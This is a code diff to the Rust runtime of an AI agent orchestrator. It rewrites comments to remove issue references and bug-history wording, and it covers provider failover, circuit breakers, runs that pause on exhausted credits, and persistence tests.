         let (registry, _dir) = registry_with_script_default(&["local-fast"]);
@@ -1173,9 +1171,9 @@ mod tests {
 
     #[test]
     fn resolve_stages_refuses_a_stage_with_no_usable_provider() {
-        // Issue #190: the last fallback in `resolve_stage_model` is unchecked,
-        // so this used to resolve to "ghost" and produce an agent that could
-        // never take a turn. It has to be an error the caller sees.
+        // The last fallback in `resolve_stage_model` is unchecked, so "ghost"
+        // resolves and would spawn an agent that can never take a turn. It has
+        // to be an error the caller sees.
         let stage = leviath_core::Stage::new("plan".to_string(), model_cfg(vec![("ghost", "m")]));
         let layout = leviath_core::layout::ContextLayout::new(vec![], 1000);
         let bp = Blueprint::new("t".to_string(), "d".to_string(), vec![stage], layout);
@@ -1229,7 +1227,7 @@ mod tests {
 
     /// The same shape, against a provider that publishes nothing. A provider
     /// that will not say what it serves cannot refuse anything, so the stage
-    /// resolves exactly as it did before this check existed.
+    /// resolves exactly as it would with no check at all.
     #[test]
     fn resolve_stages_allows_a_model_an_unpublishing_provider_never_denied() {
         let stage = leviath_core::Stage::new(
@@ -1364,7 +1362,7 @@ mod tests {
         assert_eq!(selected, vec!["shell"]);
     }
 
-    // ── failover candidates (issue #201) ──────────────────────────────────
+    // ── failover candidates ───────────────────────────────────────────────
 
     /// `[(provider, model), ...]` for readable assertions.
     fn pairs(entries: &[ModelEntry]) -> Vec<(&str, &str)> {
@@ -1384,7 +1382,7 @@ mod tests {
         let registry = registry_with(&["openrouter", "anthropic", "openai"]);
         let got = resolve_stage_candidates(&cfg, None, &ModelDefaults::default(), &registry);
         // The head is what `resolve_stage_model` picks; the tail is where
-        // failover goes. Before this, the tail was discarded at spawn.
+        // failover goes.
         assert_eq!(
             pairs(&got),
             vec![
@@ -1395,7 +1393,7 @@ mod tests {
         );
     }
 
-    // ─── the unattended cut (issue #204) ─────────────────────────────────────
+    // ─── the unattended cut ──────────────────────────────────────────────────
 
     /// A stage's tool defs for the three tools every one of these tests uses.
     fn ask_and_read_defs() -> Vec<Tool> {
@@ -1525,7 +1523,7 @@ mod tests {
     /// `default_provider` is a statement about a route and reorders routes
     /// within a model. So the blueprint's own first model stays ahead of the
     /// blueprint's later ones, and only falls through when nothing registered
-    /// can serve it (issue #578).
+    /// can serve it.
     #[test]
     fn the_users_default_model_leads_the_blueprints_entry_on_the_same_provider() {
         let cfg = model_cfg(vec![
@@ -1553,7 +1551,7 @@ mod tests {
         // A default that repeats the blueprint's own entry moves that model to
         // the head and is listed once. The models behind it keep the
         // blueprint's order rather than the provider's: `default_provider`
-        // reorders the routes to a model, not the models themselves (#578).
+        // reorders the routes to a model, not the models themselves.
         let repeated = ModelDefaults {
             provider: "ollama".to_string(),
             model: Some("qwen3.6:27b".to_string()),
@@ -1572,10 +1570,10 @@ mod tests {
 
     #[test]
     fn the_default_provider_outranks_the_stages_own_list() {
-        // `default_provider = "openrouter"` used to buy nothing: the bundled
-        // blueprints all name anthropic/openai/ollama, ollama registers with no
-        // key, so an OpenRouter-only install dispatched every stage at a
-        // localhost server that was not running.
+        // Why it has to: the bundled blueprints all name
+        // anthropic/openai/ollama, and ollama registers with no key, so an
+        // OpenRouter-only install would otherwise dispatch every stage at a
+        // localhost server that is not running.
         let cfg = model_cfg(vec![
             ("anthropic", "claude-sonnet-5"),
             ("ollama", "qwen3.5:9b"),
@@ -1673,8 +1671,8 @@ mod tests {
 
     /// A bare `--model` override replaces the model on every entry and leaves
     /// each entry's provider alone, so it invents pairs nobody asked for. One
-    /// that no provider serves used to sit in the fallback list until a failover
-    /// reached it and moved the run onto a route that cannot answer.
+    /// that no provider serves is dropped rather than left in the fallback
+    /// list for a failover to land on a route that cannot answer.
     #[test]
     fn a_rename_onto_a_provider_that_does_not_serve_it_is_dropped() {
         let cfg = model_cfg(vec![("anthropic", "sonnet"), ("openrouter", "gpt")]);
@@ -1769,8 +1767,8 @@ mod tests {
 
     #[test]
     fn an_unattended_run_loses_the_tools_that_wait_on_a_person() {
-        // The whole point of issue #204: with nobody watching, a call to
-        // `ask_user_text` can only park the agent, so the model never sees it.
+        // With nobody watching, a call to `ask_user_text` can only park the
+        // agent, so the model never sees it.
         let available = vec![
             "read_file".to_string(),
             "ask_user_text".to_string(),
@@ -2278,8 +2276,8 @@ mod tests {
 
     /// Two servers offering it means the name really is ambiguous, and there is
     /// nothing to choose between them. It resolves to no tool rather than to
-    /// one of them - the old naming's silent "whichever registered first" is
-    /// the behaviour being removed, not reproduced.
+    /// one of them: a silent "whichever registered first" is what qualified
+    /// names exist to prevent.
     #[test]
     fn an_ambiguous_unqualified_grant_resolves_to_nothing() {
         let defs = defs_named(&["github__create_issue", "gitlab__create_issue"]);

--- a/crates/leviath-runtime/src/pipeline/response.rs
+++ b/crates/leviath-runtime/src/pipeline/response.rs
@@ -48,12 +48,12 @@ const UNREACHABLE_REMEDY: &str = "check the network connection, then `lev resume
 /// `None` means the run itself is what went wrong and the caller should fail it.
 ///
 /// Two lanes ask - the stage call in [`collect_inference`] and the routing call
-/// at a stage boundary in `collect_transition_choice` - and they used to answer
-/// differently: the stage lane parked, the routing lane killed the run outright.
-/// The same blip, a different outcome, decided by which call happened to be in
-/// flight when the network went. The decision and the wording live here so the
-/// two cannot drift again; what each lane must do to keep its own continuation
-/// alive is still its own business, because those genuinely differ.
+/// at a stage boundary in `collect_transition_choice` - and they have to answer
+/// the same way. Split the decision between them and one blip parks a run or
+/// kills it depending on which call happened to be in flight when the network
+/// went. The decision and the wording live here so the two cannot drift; what
+/// each lane must do to keep its own continuation alive is still its own
+/// business, because those genuinely differ.
 pub(super) fn setup_park(
     err: &leviath_providers::ProviderError,
     provider: &str,
@@ -66,7 +66,7 @@ pub(super) fn setup_park(
         // the operator tops up and resumes. Failing here would make the run
         // permanently unresumable and throw away every iteration it has already
         // paid for, to punish somebody for a billing lapse. Unattended included
-        // - a harness that cannot rescue a run cancels it instead (issue #456).
+        // - a harness that cannot rescue a run cancels it instead.
         UnavailableReason::CreditsExhausted => Some((
             SetupBlocker::CreditsExhausted,
             format!("out of credits ({err}): top up the account, then `lev resume` this run"),
@@ -205,15 +205,15 @@ pub(crate) fn collect_inference(
             let failed = outcome.result.as_ref().err();
             match failed.and_then(|e| e.unavailable_reason()) {
                 Some(reason) => {
-                    // The kind travels with the reason now: a provider that
+                    // The kind travels with the reason: a provider that
                     // accepted the connection and then answered slowly is not
                     // the same as one that refused it, and the breaker gives the
                     // first far more rope before taking it away from every run.
                     let kind = failed.and_then(|e| e.failure_kind());
                     if circuits.record_failure(&called_provider, reason, kind, now, &policy) {
-                        // Loud and once, on the transition only. This is the
-                        // alert issue #201 asked for: without it, ten dead
-                        // runs in a row look like ten unrelated failures.
+                        // Loud and once, on the transition only: without it,
+                        // ten dead runs in a row look like ten unrelated
+                        // failures.
                         tracing::error!(
                             provider = %called_provider,
                             reason = reason.label(),
@@ -290,7 +290,7 @@ pub(crate) fn collect_inference(
                 // what the window believed it would cost, that is the only
                 // measurement of the estimator's drift there is - and on a
                 // provider whose window is a hard ceiling, drift is what
-                // decides whether the run finishes (issue #485).
+                // decides whether the run finishes.
                 calibrate(
                     &mut commands,
                     outcome.entity,
@@ -339,14 +339,13 @@ pub(crate) fn collect_inference(
                 // A provider that is out of credits or holding a rejected key
                 // is not this request's problem: every later request to it
                 // fails the same way. Move the stage to the next candidate and
-                // try again rather than killing the run (issue #201).
+                // try again rather than killing the run.
                 // Logged before the failover decision, and for every failure
                 // rather than only the ones that fail over. A call that dies
                 // without a fallback is exactly the one somebody has to
-                // diagnose, and it used to leave nothing but the error text -
-                // which for a transport failure is the same sentence whether
-                // the hostname was wrong, the port was closed, or the
-                // certificate had expired.
+                // diagnose, and the error text on its own is the same sentence
+                // for every transport failure, whether the hostname was wrong,
+                // the port was closed, or the certificate had expired.
                 tracing::warn!(
                     provider = %called_provider,
                     model = %called_model,
@@ -796,12 +795,12 @@ pub(crate) fn handle_empty_response(
         if progress.total_tool_calls > 0 || !nudge.enabled || progress.text_only_nudges >= nudge.max
         {
             // The reply is accepted as the stage's last word, so it goes into
-            // the conversation like every other turn. It used to be dropped
-            // here, which meant a transition gate that bounced the stage back
-            // was answered by a model with no memory of what it had just
-            // said - and a stage told "you have not written the file yet"
-            // with its own unwritten draft in front of it can split it; one
-            // with nothing in front of it drafts the whole thing again.
+            // the conversation like every other turn. Drop it here and a
+            // transition gate that bounces the stage back is answered by a
+            // model with no memory of what it had just said - and a stage
+            // told "you have not written the file yet" with its own unwritten
+            // draft in front of it can split it; one with nothing in front of
+            // it drafts the whole thing again.
             store_text_reply(&mut window, &infer.response);
             commands
                 .entity(entity)

--- a/crates/leviath-runtime/src/pipeline/spawn.rs
+++ b/crates/leviath-runtime/src/pipeline/spawn.rs
@@ -406,10 +406,10 @@ pub fn spawn_agent_seeded(world: &mut World, spawn: SeededSpawn) -> Result<Entit
 
 #[cfg(test)]
 mod stage_instructions_fit_tests {
-    //! The reported spawn failure, reproduced end to end.
+    //! A stage prompt bigger than the first pinned region, spawned end to end.
 
-    /// A layout shaped like the reported blueprint: a small `task` region and a
-    /// dedicated `stage_instructions` region with room for a stage prompt.
+    /// A small `task` region beside a dedicated `stage_instructions` region
+    /// with room for a stage prompt.
     fn layout(window: usize) -> leviath_core::layout::ContextLayout {
         use leviath_core::layout::{BudgetSpec, ContextLayout, RegionDefinition};
         let pct = |p: f64| BudgetSpec::Percent {
@@ -501,21 +501,20 @@ mod stage_instructions_fit_tests {
         );
     }
 
-    /// The reported failure itself: a blueprint that declares no
-    /// `stage_instructions` region at all.
+    /// A blueprint that declares no `stage_instructions` region at all.
     ///
-    /// Its prompt went to `task` - the first pinned region, sized for a sentence
-    /// from the caller - and on a small window the spawn died with
-    /// `stage system prompt does not fit region 'task'`. The workaround was to
-    /// floor every task region with a `min_tokens` sized for the largest stage
-    /// prompt, coupling an unrelated region to prompt lengths.
+    /// Without one the prompt goes to `task` - the first pinned region, sized
+    /// for a sentence from the caller - and on a small window the spawn dies
+    /// with `stage system prompt does not fit region 'task'`. The alternative
+    /// is flooring every task region with a `min_tokens` sized for the largest
+    /// stage prompt, coupling an unrelated region to prompt lengths.
     #[test]
     fn a_blueprint_that_declares_no_region_still_gets_one() {
         use leviath_core::layout::{BudgetSpec, ContextLayout, RegionDefinition};
         let window_tokens = 128_000;
         let prompt = big_prompt();
 
-        // Only `task`, at 2% - exactly the reported declaration.
+        // Only `task`, at 2% - a region sized for a sentence from the caller.
         let mut task =
             RegionDefinition::new("task".to_string(), leviath_core::RegionKind::Pinned, 0);
         task.budget = BudgetSpec::Percent {

--- a/crates/leviath-runtime/src/pipeline/stall.rs
+++ b/crates/leviath-runtime/src/pipeline/stall.rs
@@ -20,7 +20,7 @@ pub(crate) enum StallReason {
     PoolFull,
     /// Every provider this stage could use has an open circuit: they have each
     /// failed enough consecutive times to be taken out of service, and the
-    /// stage has no candidate left to move to (issue #201).
+    /// stage has no candidate left to move to.
     ///
     /// Unlike `PoolFull` this will not clear on its own within a tick or two -
     /// somebody has to top up an account or fix a key - so the watchdog fails
@@ -189,10 +189,10 @@ type StalledDispatchQuery = (
 
 /// A run parked until the machine is fixed, and what to do about it.
 ///
-/// The message is the same one that used to be the run's epitaph. It is now
-/// attached to a run that is still alive, which is the whole change: every
-/// reason this marker exists for is deterministic, outside the run's control,
-/// and undone by one edit somewhere else.
+/// The message names what somebody has to fix, and it hangs on a run that is
+/// still alive rather than on its epitaph: every reason this marker exists for
+/// is deterministic, outside the run's control, and undone by one edit
+/// somewhere else.
 #[derive(Component, Debug, Clone, PartialEq, Eq)]
 pub struct PausedForSetup {
     /// Which kind of problem, so a client can offer the right remedy rather
@@ -242,12 +242,12 @@ pub(crate) enum HeldLane {
 /// Dispatch-stall watchdog: fail any agent whose dispatch has been declining for
 /// an unresolvable reason longer than [`StallTimeout`].
 ///
-/// This is the backstop under issue #190. A stage pointing at a provider that
-/// isn't registered leaves the agent `Active` and `ReadyToInfer` with nothing in
-/// flight - so from the outside it reads as a healthy running run, for ever, at
-/// iteration 0. The daemon now re-ticks on a heartbeat, which makes the retry
-/// real, but retrying a provider that will never exist just means failing
-/// quietly for ever instead of loudly once.
+/// A stage pointing at a provider that isn't registered leaves the agent
+/// `Active` and `ReadyToInfer` with nothing in flight - so from the outside it
+/// reads as a healthy running run, for ever, at iteration 0. The daemon
+/// re-ticks on a heartbeat, which makes the retry real, but retrying a provider
+/// that will never exist just means failing quietly for ever instead of loudly
+/// once.
 ///
 /// Only [`StallReason::ProviderMissing`] is failed. A full pool is deliberately
 /// exempt: it is what backpressure is supposed to look like, and a run waiting
@@ -315,9 +315,9 @@ pub(crate) fn fail_stalled_dispatch(
             _ => SetupBlocker::ProviderMissing,
         };
         // What to fix, and - separately - whether this run will still be there
-        // to pick it up. The two were one string, so a run the branch below
-        // *failed* was told to `lev resume` it, which is not a thing that
-        // works on a failed run (issue #456).
+        // to pick it up. One string for both tells a run the branch below
+        // *failed* to `lev resume` it, which is not a thing that works on a
+        // failed run.
         let remedy = match blocker {
             SetupBlocker::CreditsExhausted => {
                 format!(
@@ -336,14 +336,13 @@ pub(crate) fn fail_stalled_dispatch(
             ),
             _ => stall.reason.give_up_message(&si.provider_name),
         };
-        // Every run parks, unattended included. This used to fail an
-        // unattended one on the reasoning that a scheduler watches for a
-        // terminal status and would wait for ever for one that never comes.
-        // That undersold harnesses: `paused` is visible in `meta.json` and
-        // `lev ps --json`, and one that can top up an account and `lev resume`
-        // gets its work back. One that cannot is no worse off than before -
-        // it cancels the run, which is a decision it can make in a second,
-        // where a failed run's work is gone for good (issue #456).
+        // Every run parks, unattended included. Failing an unattended one on
+        // the reasoning that a scheduler watches for a terminal status and
+        // would wait for ever undersells harnesses: `paused` is visible in
+        // `meta.json` and `lev ps --json`, and one that can top up an account
+        // and `lev resume` gets its work back. One that cannot is no worse
+        // off - it cancels the run, a decision it can make in a second, where
+        // a failed run's work is gone for good.
         tracing::warn!(
             provider = %si.provider_name,
             reason = stall.reason.label(),
@@ -510,13 +509,12 @@ mod tests {
 
     /// Nobody watching is not a reason to throw the work away.
     ///
-    /// This used to fail, on the reasoning that a scheduler polls for a
-    /// terminal status and would wait for ever for one that never came. A
-    /// benchmark round lost 31 runs and a tier to that (issue #456): the
-    /// account needed topping up, which is one edit elsewhere, and every one
-    /// of those runs had already done real work. A harness that can rescue a
-    /// paused run now gets to; one that cannot cancels it, which costs a
-    /// second, where a failed run's work is gone.
+    /// Failing it instead, on the reasoning that a scheduler polls for a
+    /// terminal status and would wait for ever, throws away real work: one
+    /// benchmark round lost 31 runs and a tier that way, over an account that
+    /// needed topping up. A harness that can rescue a paused run gets to; one
+    /// that cannot cancels it, which costs a second, where a failed run's
+    /// work is gone.
     #[test]
     fn an_unattended_run_parks_like_any_other_rather_than_losing_its_work() {
         let mut world = World::new();
@@ -751,7 +749,7 @@ mod tests {
 
     #[test]
     fn a_run_with_every_provider_out_of_service_is_failed_not_left_running() {
-        // The end state of issue #201: nothing left to fail over to. Waiting
+        // The end state of failover: nothing left to fail over to. Waiting
         // for ever reads as a healthy run that is going nowhere.
         let mut world = World::new();
         world.insert_resource(StallTimeout(60));
@@ -764,8 +762,8 @@ mod tests {
 
     #[test]
     fn a_run_out_of_credits_is_paused_for_a_resume_not_failed() {
-        // Issue #413: exhausted credits are an account state the operator can
-        // fix, so the watchdog pauses the run instead of ending it. The
+        // Exhausted credits are an account state the operator can fix, so
+        // the watchdog pauses the run instead of ending it. The
         // `ReadyToInfer` marker stays, so a resume re-dispatches the same
         // inference.
         let mut world = World::new();

--- a/crates/leviath-runtime/src/pipeline/tests.rs
+++ b/crates/leviath-runtime/src/pipeline/tests.rs
@@ -596,7 +596,7 @@ async fn dispatch_moves_agent_to_awaiting_and_runs_the_job() {
 
 /// The daemon's `[limits]` retry schedule reaches a dispatched job. A world
 /// that never inserts the resource takes the built-in one, which every other
-/// dispatch test here exercises (issue #417).
+/// dispatch test here exercises.
 #[tokio::test]
 async fn dispatch_uses_the_configured_retry_schedule() {
     let (mut world, mut rx) = build_world(InferencePools::new(InferencePoolConfig::new()));
@@ -757,8 +757,8 @@ impl StageInference {
 }
 
 /// A provider whose `infer` panics, standing in for any bug that kills a lane
-/// task before it can report - the case that used to leave the agent waiting on
-/// an outcome that would never arrive (issue #190).
+/// task before it can report - the case that would otherwise leave the agent
+/// waiting on an outcome that never arrives.
 struct Exploding;
 #[async_trait::async_trait]
 impl Provider for Exploding {
@@ -910,8 +910,8 @@ fn collect_applies_ok_and_advances_to_process_response() {
 
 /// An agent paused mid-inference must not be advanced by the response landing.
 ///
-/// This is the half of the bug that looked like a spontaneous resume: the run
-/// still read `paused` while its tool calls ran and its stage moved on.
+/// Letting it through looks like a spontaneous resume: the run still reads
+/// `paused` while its tool calls run and its stage moves on.
 #[test]
 fn collect_holds_a_success_that_lands_on_a_paused_agent() {
     let (mut world, tx) = world_with_results();
@@ -956,9 +956,9 @@ fn collect_holds_a_success_that_lands_on_a_paused_agent() {
     );
 }
 
-/// The half that actually destroyed runs: a failure landing on a paused agent
-/// used to overwrite `Paused` with `Error`, ending a run with dozens of
-/// iterations of completed work behind it.
+/// A failure landing on a paused agent must not overwrite `Paused` with
+/// `Error`, which would end a run with dozens of iterations of completed work
+/// behind it.
 #[test]
 fn collect_holds_a_failure_that_lands_on_a_paused_agent() {
     let (mut world, tx) = world_with_results();
@@ -1108,7 +1108,7 @@ fn collect_marks_error_on_failure() {
     );
 }
 
-// ── provider failover on an unusable provider (issue #201) ──
+// ── provider failover on an unusable provider ───────────────
 
 /// A stage on `dead/model-a` with one place left to go.
 fn stage_with_fallback() -> StageInference {
@@ -1202,7 +1202,7 @@ fn failover_is_recorded_in_the_stage_log() {
 fn an_exhausted_fallback_list_pauses_on_credits_instead_of_dying() {
     // Last provider standing and the account is out of credits: that is an
     // account state, not a defect in the run, so the run pauses for a
-    // `lev resume` instead of ending (issue #413). The retry stays staged.
+    // `lev resume` instead of ending. The retry stays staged.
     let (mut world, tx) = world_with_results();
     let mut si = stage_with_fallback();
     si.fallbacks.clear();
@@ -1255,11 +1255,12 @@ fn an_exhausted_fallback_list_pauses_on_credits_instead_of_dying() {
 /// error is more useful than patience keeps getting one.
 /// An empty account parks an unattended run too.
 ///
-/// It used to fail, and that cost a benchmark round 31 runs (issue #456). The
-/// error also arrived as three different terminal shapes depending on where it
-/// landed - the worst being a run that died on its output stage and recorded
-/// "never called submit_output", which names the wrong cause entirely. Parking
-/// at the point of failure collapses all three into one answer.
+/// Failing it throws away work a top-up would recover: one benchmark round
+/// lost 31 runs that way. The error also arrives as three different terminal
+/// shapes depending on where it lands - the worst being a run that dies on its
+/// output stage and records "never called submit_output", which names the wrong
+/// cause entirely. Parking at the point of failure collapses all three into one
+/// answer.
 #[test]
 fn an_unattended_run_out_of_credits_parks_instead_of_losing_its_work() {
     let (mut world, tx) = world_with_results();
@@ -1411,7 +1412,7 @@ fn an_ordinary_error_does_not_burn_a_fallback() {
 #[test]
 fn provider_fatal_failures_trip_the_breaker_and_a_success_clears_it() {
     // Failing over rescues *this* run. The breaker is what stops the next ten
-    // runs each rediscovering the same dead account (issue #201).
+    // runs each rediscovering the same dead account.
     let (mut world, tx) = world_with_results();
     let policy = CircuitPolicy {
         failures_before_open: 2,
@@ -1644,7 +1645,7 @@ fn an_unusable_provider_without_a_stage_component_still_terminates() {
     // `StageInference` is optional on the query, so the failover branch has to
     // cope with its absence rather than assuming one is attached. A dead key
     // rather than dead credits, because exhausted credits pause instead of
-    // terminating (issue #413).
+    // terminating.
     let (mut world, tx) = world_with_results();
     let e = world.spawn((agent_state(), AwaitingInference)).id();
     tx.send(InferenceOutcome {
@@ -1664,7 +1665,7 @@ fn an_unusable_provider_without_a_stage_component_still_terminates() {
     assert!(world.get::<ResolveTransition>(e).is_some());
 }
 
-// ── stage-io persistence (#1) ──
+// ── stage-io persistence ───────
 
 fn ledger2() -> StageLedger {
     StageLedger(vec![
@@ -1753,7 +1754,7 @@ fn reconcile_stage_ledger_keeps_the_clock_running_while_held_for_children() {
     assert_eq!(led.0[0].active_runtime_secs(400), 300);
 }
 
-// ─── A stage that never ran says so (#372) ───────────────────────────────────
+// ─── A stage that never ran says so ──────────────────────────────────────────
 
 fn three_stage_ledger() -> StageLedger {
     StageLedger(vec![
@@ -1764,10 +1765,10 @@ fn three_stage_ledger() -> StageLedger {
 }
 
 /// A graph reaches its stages in whatever order its edges describe, so a branch
-/// the run went past without taking is not "finished". It used to be recorded
-/// `Complete` with an empty `region_tokens`, and because that map is a
-/// snapshot, an empty one in the middle made the *next* real stage look like it
-/// had written every region from nothing.
+/// the run went past without taking is not "finished". Recording it `Complete`
+/// with an empty `region_tokens` makes the *next* real stage look like it wrote
+/// every region from nothing, because that map is a snapshot rather than a
+/// per-stage delta.
 #[test]
 fn a_stage_the_run_never_entered_is_skipped_not_complete() {
     use leviath_core::run_meta::StageRunStatus;
@@ -1902,7 +1903,7 @@ fn collect_inference_buffers_output_token_line_and_stage_tokens() {
     assert_eq!(led.0[1].cached_tokens, 2);
 }
 
-// ─── requests the runtime must never build (issue #495) ──────────────
+// ─── requests the runtime must never build ───────────────────────────
 
 /// A prompt that reaches the window leaves nothing to answer with, and the
 /// derived completion budget went to zero. Providers reject that outright
@@ -2000,7 +2001,7 @@ fn the_completion_budget_stays_inside_what_the_window_has_left() {
     );
 }
 
-// ─── estimator calibration (issue #485) ───
+// ─── estimator calibration ────────────────
 //
 // The arithmetic is unit-tested in `pipeline::calibration`. What these cover is
 // the wiring, which is the half that can silently do nothing: whether dispatch
@@ -2385,10 +2386,10 @@ fn collect_tools_buffers_one_tool_log_line_per_call() {
 /// A title arriving after the run's last move still reaches disk.
 ///
 /// The watermark tracks iteration, stage and status - none of which a title
-/// touches - so a name that landed late used to sit in memory until the next
-/// heartbeat, which a finished run is unloaded before reaching. The name was
-/// simply lost, which is what made the retry and failover behind it pointless
-/// for any run that ended quickly.
+/// touches - so without a check of its own a name that lands late sits in
+/// memory until the next heartbeat, which a finished run is unloaded before
+/// reaching. The name is lost, and the retry and failover behind it bought
+/// nothing for any run that ended quickly.
 #[test]
 fn a_title_that_lands_after_the_last_move_still_reaches_disk() {
     let (mut world, mut rx) = world_with_persistence();
@@ -2437,7 +2438,7 @@ fn a_title_that_lands_after_the_last_move_still_reaches_disk() {
 
 /// A title is not the agent moving, so it must not advance the progress stamp
 /// `lev ps` ages its rows against - that stamp is the one thing separating a
-/// slow run from a wedged one (issue #184).
+/// slow run from a wedged one.
 #[test]
 fn a_landed_title_is_a_write_but_not_progress() {
     let (mut world, mut rx) = world_with_persistence();
@@ -2499,9 +2500,9 @@ fn dispatch_persistence_emits_stage_index_and_drains_io_buffer() {
 }
 
 /// The persist tick rewrites `stages.json` whole, so what the reload leaves in
-/// the ledger is what lands on disk. A reload that left the spawn-seeded zeros
-/// there did not merely lose the run's stage history, it erased the copy that
-/// was still on disk (issue #415).
+/// the ledger is what lands on disk. A reload that leaves the spawn-seeded
+/// zeros there does not merely lose the run's stage history, it erases the copy
+/// still on disk.
 #[test]
 fn a_restored_ledger_reaches_the_persist_tick_instead_of_the_seeded_zeros() {
     let (mut world, mut rx) = world_with_persistence();
@@ -2548,17 +2549,17 @@ fn a_restored_ledger_reaches_the_persist_tick_instead_of_the_seeded_zeros() {
 
 /// Every snapshot carries the answer's bytes whenever the agent holds them.
 ///
-/// It used to send them once and rely on a sender-side watermark thereafter.
-/// That watermark advanced when the job was *built*, but the persistence lane
+/// Sending them once and relying on a sender-side watermark does not work: the
+/// watermark advances when the job is *built*, but the persistence lane
 /// coalesces queued snapshots per run and keeps only the newest - so a run that
-/// finished inside one persistence window had the job carrying the body dropped
-/// as superseded, while every later job still wrote `meta.json`'s descriptor.
-/// The two halves then disagreed for good, and `read_final_output` reads that as
-/// "no answer" (issue #276).
+/// finishes inside one persistence window has the job carrying the body dropped
+/// as superseded, while every later job still writes `meta.json`'s descriptor.
+/// The two halves then disagree for good, and `read_final_output` reads that as
+/// "no answer".
 ///
 /// Not writing the same quarter-megabyte file on every heartbeat is still worth
-/// doing; it now happens in the lane, past the coalescing, where whether a job
-/// was written is a fact rather than an assumption.
+/// doing; it happens in the lane, past the coalescing, where whether a job was
+/// written is a fact rather than an assumption.
 /// The reason a run is parked reaches `meta.json` through the real system, not
 /// just through the mapper.
 ///
@@ -2716,9 +2717,10 @@ fn dispatch_persistence_always_carries_the_answer_for_the_lane_to_judge() {
     );
 
     // A second tick carries the same answer again. Backdating the watermark
-    // makes the heartbeat due, which is the tick that previously sent nothing.
+    // makes the heartbeat due, which is the tick a sender-side watermark would
+    // let through empty.
     //
-    // This is the assertion that pins the bug: if this snapshot were the one to
+    // This is the assertion that matters: if this snapshot were the one to
     // survive coalescing and it carried no body, the descriptor below would
     // reach `meta.json` with no sidecar beside it.
     world
@@ -3804,7 +3806,7 @@ fn empty_response_nudges_and_loops_back_when_text_only() {
 
 #[test]
 fn empty_response_respects_a_stage_that_disables_its_nudge() {
-    // The issue-#127 shape: the stage knows its deliverable is text and says so.
+    // The stage knows its deliverable is text and says so.
     let mut bp = nudge_bp(false);
     bp.0.stages[0].nudge = Some(leviath_core::NudgeConfig {
         enabled: Some(false),
@@ -4286,7 +4288,7 @@ async fn dispatch_tools_enqueues_runnable_job_and_advances() {
     assert_eq!(results, vec![("t".to_string(), "ran n".to_string())]);
 }
 
-// ── batch journaling at dispatch (#96) ──
+// ── batch journaling at dispatch ────────
 
 /// A tool service whose executor reports each call through `progress` before
 /// returning - the shape the CLI executor has.
@@ -4452,12 +4454,12 @@ async fn dispatch_all_inline_batch_is_not_journaled() {
 
 /// A batch of only inline-resolved calls still says what it did.
 ///
-/// It returns before `collect_tools`, which is where every other batch gets its
-/// `[tool]` lines, so it used to leave no trace a person could read: nothing in
-/// `logs.log`, nothing in the journal, and yet `meta.tool_calls` counted it. A
-/// run could report 45 tool calls beside a stage log holding none of them,
-/// which is how an empty activity panel read as a dropped-log bug rather than
-/// as the model having only written to its own context (issues #589, #595).
+/// It returns before `collect_tools`, which is where every other batch gets
+/// its `[tool]` lines, so without a log of its own it leaves no trace a person
+/// can read: nothing in `logs.log`, nothing in the journal, and yet
+/// `meta.tool_calls` counts it. A run then reports 45 tool calls beside a stage
+/// log holding none of them, and an empty activity panel reads as a dropped-log
+/// bug rather than as the model having only written to its own context.
 #[tokio::test]
 async fn dispatch_logs_an_all_inline_batch_it_would_otherwise_swallow() {
     let (jtx, _jrx) = mpsc::unbounded_channel();
@@ -4740,10 +4742,10 @@ fn a_fan_out_call_is_read_inline_and_never_reaches_the_lane() {
 /// rest of the batch lands normally.
 ///
 /// `merge_in_call_order` fills a call with no entry in `context_results` with an
-/// empty string, so the fan-out call used to get a placeholder here and the real
-/// report from `finish_tool_fan_out` later - two `tool_result` blocks under one
-/// id. Anthropic rejects the next request with "each tool_use must have a single
-/// result", which killed a live run after its workers had already spawned.
+/// empty string, so a placeholder written here plus the real report from
+/// `finish_tool_fan_out` later would be two `tool_result` blocks under one id.
+/// Anthropic rejects the next request with "each tool_use must have a single
+/// result", killing the run after its workers have already spawned.
 #[test]
 fn parking_on_a_fan_out_writes_no_result_for_it_yet() {
     let (mut world, _jrx) = world_with_lane();
@@ -5890,8 +5892,8 @@ fn invalid_args_refusal_without_a_def_or_constraint_is_none() {
 }
 
 /// Every refusal prefix dispatch can produce reads as "this never happened".
-/// `[blocked]` was missing until issue #155's pass, so a taint-blocked write
-/// counted as a modification.
+/// Miss one - `[blocked]`, say - and a taint-blocked write counts as a
+/// modification.
 #[test]
 fn call_had_no_effect_covers_every_refusal_prefix() {
     assert!(call_had_no_effect("[error] boom"));
@@ -6006,10 +6008,10 @@ fn tainted_output_window() -> ContextWindow {
     w
 }
 
-/// `submit_output` was applied inline before the gate ran, so its
-/// classification was never consulted in a live run: reclassifying it as
-/// outbound gated nothing. The gate now runs first. Headless, the block is
-/// the model's tool result and no answer is recorded.
+/// The gate runs before `submit_output` is applied. Apply it inline first and
+/// its outbound classification is never consulted, so the gate holds back
+/// nothing. Headless, the block is the model's tool result and no answer is
+/// recorded.
 #[tokio::test]
 async fn dispatch_tools_gates_a_submission_over_tainted_context() {
     let (jtx, mut jrx) = mpsc::unbounded_channel();
@@ -7722,10 +7724,10 @@ fn enter_stage_swaps_context_layout() {
 
     let w = world.get::<ContextWindow>(e).unwrap();
     assert!(w.get_region("scratch").is_some(), "the stage's own region");
-    // The region the stage did not declare is HELD, not dropped. It used to be
-    // deleted, which made a per-stage layout unusable for narrowing a view in a
-    // pipeline whose later stages still need the data: re-declaring it
-    // downstream brought it back empty.
+    // The region the stage did not declare is HELD, not dropped. Deleting it
+    // would make a per-stage layout unusable for narrowing a view in a pipeline
+    // whose later stages still need the data: re-declaring it downstream would
+    // bring it back empty.
     assert!(
         w.get_region("sys").is_some(),
         "an omitted region must survive the stage it is not shown to"
@@ -8233,8 +8235,8 @@ fn retry_policy_for_overrides_job_timeout_when_set() {
 
 /// The `[limits]` retry schedule reaches the policy, and reaches only the two
 /// numbers it owns: the capacity backoff and the total-backoff ceiling are the
-/// runtime's own bound on a provider outage and are not an operator's to raise
-/// (issue #417).
+/// runtime's own bound on a provider outage and are not an operator's to
+/// raise.
 #[test]
 fn retry_policy_for_takes_the_configured_schedule() {
     let default = crate::inference_bridge::RetryPolicy::default();
@@ -8949,7 +8951,7 @@ fn enforce_max_iterations_caps_at_the_limit() {
         &StageOutcome::MaxIterations
     );
     // The run records it: a stage that ran out of iterations is one way a
-    // run ends up with nothing to show (issue #107).
+    // run ends up with nothing to show.
     assert_eq!(
         world
             .get::<crate::persistence::RunOutcomeFlags>(e)
